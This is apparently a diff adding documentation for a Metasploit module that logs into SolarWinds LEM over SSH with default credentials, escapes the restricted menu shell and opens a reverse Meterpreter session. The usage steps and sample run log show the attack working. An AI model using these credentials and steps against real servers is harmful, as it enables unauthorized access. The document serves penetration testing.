Add documentation

documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md

@@ -0,0 +1,49 @@
+## Vulnerable Application
+
+This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
+
+Vulnerable application can be download as a free trial from vendor webpage.
+[http://www.solarwinds.com/log-event-manager](http://www.solarwinds.com/log-event-manager)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use exploit/linux/ssh/solarwinds_lem_exec`
+  3. Do: `set rhost <ip>`
+  4. Do: `set lhost <ip>`
+  5. Do: `exploit`
+  6. You should get a shell.
+
+## Scenarios
+
+This is a run against a known vulnerable Solarwinds LEM server.
+```
+msf exploit(solarwind_lem_exec) > exploit 
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] 12.0.0.154:32022 - Attempt to login...
+[+] SSH connection is established.
+[*] Requesting pty... We need it in order to interact with menuing system.
+[+] Pty successfully obtained.
+[*] Requesting a shell.
+[+] Remote shell successfully obtained.
+[+] Step 1 is done. Managed to access terminal menu.
+[+] Step 2 is done. Managed to select 'service' sub menu.
+[+] Step 2 is done. Managed to select 'service' sub menu.
+[+] Step 3 is done. Managed to start 'restrictssh' function.
+[+] Step 4 is done. We are going to try escape from jail shell.
+[+] Sweet..! Escaped from jail.
+[*] Delivering payload...
+[*] Sending stage (38651 bytes) to 12.0.0.154
+[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300
+[-] Exploit failed: Errno::EBADF Bad file descriptor
+[*] Exploit completed, but no session was created.
+
+msf exploit(solarwind_lem_exec) > sessions -i 1 
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: cmc
+meterpreter > 
+```
+